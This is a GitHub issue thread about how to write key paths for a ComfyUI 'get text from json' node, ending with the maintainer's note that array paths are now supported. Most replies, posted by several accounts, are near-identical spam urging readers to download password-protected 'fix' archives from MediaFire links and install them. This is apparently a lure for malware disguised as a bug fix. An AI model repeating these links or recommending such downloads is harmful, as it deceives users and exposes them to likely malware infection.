### ISSUE TITLE
Key syntax for “get text from json”

### ISSUE THREAD

**Issue by adamreading** [sipherxyz/comfyui-art-venture#44]
I am trying to pull metadata out of online ComfyFlow Workflow in Tensor. 
I have used the “Load workflow (current)” and joined that to “get text from json” then connected the output from that to a text concat and into create text mask, this works with other text inputs to the concat to provide a formatted text image. But no matter what combination of key names I have tried - nothing comes out.
![IMG_6906](https://github.com/user-attachments/assets/a4e4262a-aecd-4567-a436-94cd2fac03b4)
![IMG_6905](https://github.com/user-attachments/assets/93616b14-3d98-4378-a85b-da90cbd792c4)

What is the correct way to reference the key to bring forth the text inside that object?
[ta_workflow (2).json](https://github.com/user-attachments/files/16751352/ta_workflow.2.json)

It may just be that Tensor is blocking this - as there is currently no way to get metadata out of the tensor workflow system, except manually dropping the image onto an empt workflow - or doing a remix on a posted image. But when you are doing a ton of testing - you need a way to see the settings for each batch - so an automated image in each batch showing the params would solve this.

**Comment by tonywk** [comment]
Download 
https://www.mediafire.com/file/wpwfw3bpd8gsjey/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by adamreading** [comment]
> Download https://www.mediafire.com/file/wpwfw3bpd8gsjey/fix.rar/file password: changeme In the installer menu, select "gcc."

This is in Tensor.art - Online workflow using ComfyUI - comfyflow - so I can only use nodes they already provide

**Comment by masooddahmedd** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by mabhi02** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by mabhi02** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/6mkbh6xhau31g
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by enricozao** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/6mkbh6xhau31g
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by enricozao** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/6mkbh6xhau31g
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by masooddahmedd** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/6mkbh6xhau31g
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by tungnguyensipher** [comment]
It was not possible to parse JSON with array in path back then. I just added the support recently. Maybe late but hope this can help: https://github.com/sipherxyz/comfyui-art-venture?tab=readme-ov-file#getfromjson
